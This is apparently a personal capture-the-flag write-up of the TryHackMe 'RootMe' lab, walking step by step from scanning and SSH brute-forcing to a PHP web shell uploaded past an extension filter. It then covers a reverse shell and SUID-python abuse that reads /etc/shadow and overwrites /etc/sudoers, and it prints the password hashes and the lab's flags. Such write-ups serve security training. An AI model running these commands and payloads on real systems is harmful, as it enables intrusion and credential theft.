# rootme

## <img src="https://2655899946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl8QcDIN52F6jN9Gr2mdt%2Fuploads%2FYsd0fjkYpXdkwZQLAtns%2Fimage.png?alt=media&#x26;token=3712aeef-fb62-4b52-8a35-4f5c6ba16b2c" alt="" data-size="line">ROOTME WRITEUP

#### *By Jacvbtaylor* <a href="#by_jacvbtaylor__1" id="by_jacvbtaylor__1"></a>

```
           Used openvpn and Kali Linux 
                     https://tryhackme.com/room/rrootme
             completed August 30, 2022
```

## Step 1: <a href="#step_1_12" id="step_1_12"></a>

`nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt`

**This script I wrote scans the host (or subnets if applied) and puts the IP(s) into a txt file that have responded and are up. Nmap takes that file and scans the hosts that are running, putting those results into a different txt (This script is very helpful when scanning a network as apposed to a single machine, but I still like to use it).**

**Once I have established a good baseline of what is running and open on the target, I will start another scan to look for vulnerabilites on that machine while I check out the rest of the open ports.**

`nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt`

**In this case, port 22 and 80 and running. There is a webpage for 10.10.52.28, but nothing to interact with for this index.**

## Step 2: <a href="#step_2_24" id="step_2_24"></a>

**I tried running a directory attack using dirb, with no luck. I stopped it after about 10 minutes to switch to this**

`gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt`

**which resulted in a much faster and successful outcome. With this, I can gravitate toward the status 301 results.**

* /.hta (Status: 403) \[Size: 276]
* /.htpasswd (Status: 403) \[Size: 276]
* /.htaccess (Status: 403) \[Size: 276]
* /css (Status: 301) \[Size: 308] \[–> <http://10.10.52.28/css/>]
* /index.php (Status: 200) \[Size: 616]
* /js (Status: 301) \[Size: 307] \[–> <http://10.10.52.28/js/>]
* /panel (Status: 301) \[Size: 310] \[–> <http://10.10.52.28/panel/>]
* /server-status (Status: 403) \[Size: 276]
* /uploads (Status: 301) \[Size: 312] \[–> <http://10.10.52.28/uploads/>]

**Browsing to** [**http://10.10.52.28/panel/**](http://10.10.52.28/panel/) **brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to** [**http://10.10.52.28/uploads**](http://10.10.52.28/uploads) **which showed me an index of the files in that folder.**

## Step 3: <a href="#step_3_46" id="step_3_46"></a>

**This has a lot of potential, but while I try to exploit this, I ran a bruteforce on the SSH port in the event I may be able to discover an existing username and password**

`hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4`

**While this runs in the background, I began to think of the kind of files I can upload.**

**I started by creating a php file called cmd.php**

```
<?php
  $command = $_GET['cmd'];
  echo system($command);
  ?>
```

## Step 4: <a href="#step_4_60" id="step_4_60"></a>

**The server responding with a message saying PHP is prohibited.**

**I uploaded the same file but with name cmd.php.jpg and this uploaded successfully. I am unable to execute the code with that extension so my next step is to figure out if there are other valid extension that will allow PHP to run.**

**I changed the name to cmd.phtml, uploaded, visited the url** [**http://10.10.52.28/uploads/cmd.phtml**](http://10.10.52.28/uploads/cmd.phtml) **and was greeted with a blank page.**

**It worked! Next step is to test commands.**

<http://10.10.52.28/uploads/cmd.phtml?cmd=ls>

```
cmd.php.jpg cmd.phtml eth0.txt eth0.txt
```

<http://10.10.52.28/uploads/cmd.phtml?cmd=whoami>

```
www-data www-data
```

## Step 5: <a href="#step_5_80" id="step_5_80"></a>

**Next step is to try and run some scripts. I first encoded this cd …/…/…/ && ls**

[http://10.10.52.28/uploads/cmd.phtml?cmd=cd …%2F…%2F…%2F %26%26 ls](http://10.10.52.28/uploads/cmd.phtml?cmd=cd%20..%2F..%2F..%2F%20%26%26%20ls)

```
backups cache crash lib local lock log mail opt run snap spool tmp www www
```

[http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd](http://10.10.52.28/uploads/cmd.phtml?cmd=cat%20%2Fetc%2Fpasswd)

```
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin test:x:1001:1001:,,,:/home/test:/bin/bash test:x:1001:1001:,,,:/home/test:/bin/bash
```

**This was a lot of info, so to simplify, I ran**

[http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd | awk -F "%3A" '{print%241}'](http://10.10.52.28/uploads/cmd.phtml?cmd=cat%20%2Fetc%2Fpasswd%20%7C%20awk%20-F%20%22%3A%22%20%27%7Bprint%241%7D%27)

```
root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate rootme sshd test test
```

## Step 6: <a href="#step_6_99" id="step_6_99"></a>

**This output all of the users for the server. This may come in handy for the SSH bruteforce but we can still maybe exploit the server more through this file upload. Maybe a PHP reverse shell?**

**Before trying that, I stopped my SSH bruteforce and changed the script to a valid username**

`hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4`

**Again, I am going to let this run while I explore more options.**

**The last thing I wanted to try with the URL cmd’s was to find who the sudo users are**

[http://10.10.52.28/uploads/cmd.phtml?cmd=getent group | grep sudo](http://10.10.52.28/uploads/cmd.phtml?cmd=getent%20group%20%7C%20grep%20sudo%20)

```
sudo:x:27:rootme sudo:x:27:rootme
```

## Step 7: <a href="#step_7_118" id="step_7_118"></a>

**Now to create a reverse shell. I was able to make a new phtml file embedded with pentest monkey’s PHP reverse shell, uploading it to the site from the panel page and then running this script before running the file from the browser**

`ufw allow from 10.10.10.28 proto tcp to any port 1234 && nc -lnvp 4334`

**It worked!**

> listening on \[any] 4334 …\
> connect to \[10.2.12.19] from (UNKNOWN) \[10.10.52.28] 52082\
> Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86\_64 x86\_64 x86\_64 GNU/Linux\
> 21:33:01 up 1:41, 0 users, load average: 0.00, 0.01, 0.00\
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\
> uid=33(www-data) gid=33(www-data) groups=33(www-data)\
> /bin/sh: 0: can’t access tty; job control turned off\
> `$ whoami`\
> www-data

## Step 8: <a href="#step_8_137" id="step_8_137"></a>

**Now comes the hard part. This is my first time being stuck as the www user. We have no sudo privileges. After some researching, I came across a possibility of an SUID escalation. To see the files with SUID permissions, I ran this:**

`$ find / -perm -u=s -type f 2>/dev/null`\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/usr/lib/snapd/snap-confine\
/usr/lib/x86\_64-linux-gnu/lxc/lxc-user-nic\
/usr/lib/eject/dmcrypt-get-device\
/usr/lib/openssh/ssh-keysign\
/usr/lib/policykit-1/polkit-agent-helper-1\
/usr/bin/traceroute6.iputils\
/usr/bin/newuidmap\
/usr/bin/newgidmap\
/usr/bin/chsh\
/usr/bin/python\
/usr/bin/at\
/usr/bin/chfn\
/usr/bin/gpasswd\
/usr/bin/sudo\
/usr/bin/newgrp\
/usr/bin/passwd\
/usr/bin/pkexec\
/snap/core/8268/bin/mount\
/snap/core/8268/bin/ping\
/snap/core/8268/bin/ping6\
/snap/core/8268/bin/su\
/snap/core/8268/bin/umount\
/snap/core/8268/usr/bin/chfn\
/snap/core/8268/usr/bin/chsh\
/snap/core/8268/usr/bin/gpasswd\
/snap/core/8268/usr/bin/newgrp\
/snap/core/8268/usr/bin/passwd\
/snap/core/8268/usr/bin/sudo\
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/snap/core/8268/usr/lib/openssh/ssh-keysign\
/snap/core/8268/usr/lib/snapd/snap-confine\
/snap/core/8268/usr/sbin/pppd\
/snap/core/9665/bin/mount\
/snap/core/9665/bin/ping\
/snap/core/9665/bin/ping6\
/snap/core/9665/bin/su\
/snap/core/9665/bin/umount\
/snap/core/9665/usr/bin/chfn\
/snap/core/9665/usr/bin/chsh\
/snap/core/9665/usr/bin/gpasswd\
/snap/core/9665/usr/bin/newgrp\
/snap/core/9665/usr/bin/passwd\
/snap/core/9665/usr/bin/sudo\
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/snap/core/9665/usr/lib/openssh/ssh-keysign\
/snap/core/9665/usr/lib/snapd/snap-confine\
/snap/core/9665/usr/sbin/pppd\
/bin/mount\
/bin/su\
/bin/fusermount\
/bin/ping\
/bin/umount

**using the list output from the last command, I cross referenced the list here** [**https://gtfobins.github.io/#+suid**](https://gtfobins.github.io/#+suid) **. To make it a little easier to cross reference, I spent way too long sorting the information by creating this script that puts the files I need to read MOSTLY in alphabetical order**

`find / -perm -u=s -type f 2>/dev/null | sed -e 's/snap\/core//g;s/\/9//g;s/\/6//;s/bin//;s/\/8//g' | awk -F "/" '{print$3,$4,$5}' | sed -e 's/usr//;s/lib//g' | sort`

## Step 9: <a href="#step_9_202" id="step_9_202"></a>

**Python seems to be the only match to have SUID privileges. I loaded a shell using Python**

`$ whoami`\
www-data\
`$ su rootme`\
su: must be run from a terminal\
`$ python -c 'import os; os.system("/bin/sh")'`

**Same outcome as the reverse PHP shell. Still stuck as the www user for now.**

> `whoami`\
> www-data\
> `id`\
> uid=33(www-data) gid=33(www-data) groups=33(www-data)\
> `su`\
> su: must be run from a terminal\
> `su rootme`\
> su: must be run from a terminal

## Step 10: <a href="#step_10_224" id="step_10_224"></a>

**Referencing** [**https://rastating.github.io/privilege-escalation-via-python-library-hijacking/**](https://rastating.github.io/privilege-escalation-via-python-library-hijacking/) **it seems there may be a possibility of hijacking a library. This seems promising, but only if we discover some cron jobs ran by root a file or folder that we can write to for the python library.**

`python -c 'import sys; print "\n".join(sys.path)'`

> /usr/lib/python2.7\
> /usr/lib/python2.7/plat-x86\_64-linux-gnu\
> /usr/lib/python2.7/lib-tk\
> /usr/lib/python2.7/lib-old\
> /usr/lib/python2.7/lib-dynload\
> /usr/local/lib/python2.7/dist-packages\
> /usr/lib/python2.7/dist-packages

**After trying what felt like everything, I was finally able to get access to the shadow file using this python script**

`python -c 'print(open("/etc/shadow").read())'`

> root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7:::\
> daemon:*:18295:0:99999:7:::*\
> \&#xNAN;*bin:*:18295:0:99999:7:::\
> sys:*:18295:0:99999:7:::*\
> \&#xNAN;*sync:*:18295:0:99999:7:::\
> games:*:18295:0:99999:7:::*\
> \&#xNAN;*man:*:18295:0:99999:7:::\
> lp:*:18295:0:99999:7:::*\
> \&#xNAN;*mail:*:18295:0:99999:7:::\
> news:*:18295:0:99999:7:::*\
> \&#xNAN;*uucp:*:18295:0:99999:7:::\
> proxy:*:18295:0:99999:7:::*\
> \&#xNAN;*www-data:*:18295:0:99999:7:::\
> backup:*:18295:0:99999:7:::*\
> \&#xNAN;*list:*:18295:0:99999:7:::\
> irc:*:18295:0:99999:7:::*\
> \&#xNAN;*gnats:*:18295:0:99999:7:::\
> nobody:*:18295:0:99999:7:::*\
> \&#xNAN;*systemd-network:*:18295:0:99999:7:::\
> systemd-resolve:*:18295:0:99999:7:::*\
> \&#xNAN;*syslog:*:18295:0:99999:7:::\
> messagebus:*:18295:0:99999:7:::*\
> \&#xNAN;*\_apt:*:18295:0:99999:7:::\
> lxd:*:18295:0:99999:7:::*\
> \&#xNAN;*uuidd:*:18295:0:99999:7:::\
> dnsmasq:*:18295:0:99999:7:::*\
> \&#xNAN;*landscape:*:18295:0:99999:7:::\
> pollinate:*:18295:0:99999:7:::*\
> \&#xNAN;*rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7:::*\
> \&#xNAN;*sshd:*:18478:0:99999:7:::\
> test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::

## Step 11: <a href="#step_11_276" id="step_11_276"></a>

`python -c 'print(open("/etc/shadow").read())' | cat /etc/shadow | awk -F ":" '{print$1,$2}' | sed -n '/*/!p;/!/!p' > hashes`

`ls`\
hashes\
`cat hashes`

```
root $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
```

`sed 's/ /:/g' hashes > userhash`\
`cat userhash`

```
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
```

**I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using john the ripper to crack any of the 3 password hashes I collected, but still no luck.**

## Step 12: <a href="#step_12_298" id="step_12_298"></a>

**I thought back to what I had done to even get that information in the first place. I used python to open a file, what’s stopping me from writing to one??**

`python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")'`\
`sudo -i`\
mesg: ttyname failed: Inappropriate ioctl for device\
`su`\
`whoami`\
root\
`passwd www-data`\
Enter new UNIX password: test\
Retype new UNIX password: test\
passwd: password updated successfully

**I finally moved up a user! The PHP shell we are still operating from is limited to certain commands, so I wanted to try my best to get an SSH login with my www user, but kept getting kicked out after logging in.**

> root㉿kali)-\[/home/kali/rootme]\
> └─# `ssh www-data@10.10.52.28 -p 22`\
> <www-data@10.10.52.28>'s password:\
> Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86\_64)\
> System information as of Wed Aug 31 00:06:05 UTC 2022\
> System load: 0.11 Processes: 115\
> Usage of /: 20.5% of 19.56GB Users logged in: 0\
> Memory usage: 44% IP address for eth0: 10.10.52.28\
> Swap usage: 0%\
> Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19\
> This account is currently not available.\
> Connection to 10.10.52.28 closed.\
> ┌──(root㉿kali)-\[/home/kali/rootme]\
> └─#

## Step 13: <a href="#step_13_335" id="step_13_335"></a>

**Oh well. Going back to the PHP shell, I located the user.txt file in /var/www**

```
THM{y0u_g0t_a_sh3ll}
```

**Lastly, I needed to locate the root.txt file**

`pwd`\
/root\
`ls`\
root.txt\
`cat root.txt`

```
THM{pr1v1l3g3_3sc4l4t10n}
```